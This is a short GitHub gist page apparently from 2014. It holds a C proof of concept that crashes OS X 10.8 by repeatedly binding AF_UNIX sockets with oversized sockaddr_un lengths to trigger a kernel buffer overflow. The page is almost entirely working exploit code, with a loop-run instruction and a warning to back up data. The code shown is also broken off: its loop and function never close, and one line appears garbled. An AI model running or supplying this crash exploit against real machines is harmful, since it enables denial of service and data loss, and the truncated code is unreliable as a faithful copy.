Skip to content

Instantly share code, notes, and snippets.



Created Feb 8, 2014
What would you like to do?
PoC of OS X sockaddr_un system crash
// Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run.
// The buffer overflow usually gets triggered within the first three
// or four runs. Make sure you back up your data first!
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
int main(void) {
struct sockaddr_un *s;
char buf[1024];
size_t len;
int fd;
int rc;
memset(buf, 'a', sizeof(buf));
s = (struct sockaddr_un *) buf;
s->sun_family = AF_UNIX;
for (len = sizeof(*s); len < sizeof(buf); len += 1) {
fd = socket(AF_UNIX, SOCK_STREAM, 0);
assert(fd >= 0);
rc = bind(fd, (struct sockaddr *) s, len);
if (rc) {
printf("len=%zu\n", len);
buf[len] = 0;
buf[len] = 'a';
return 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment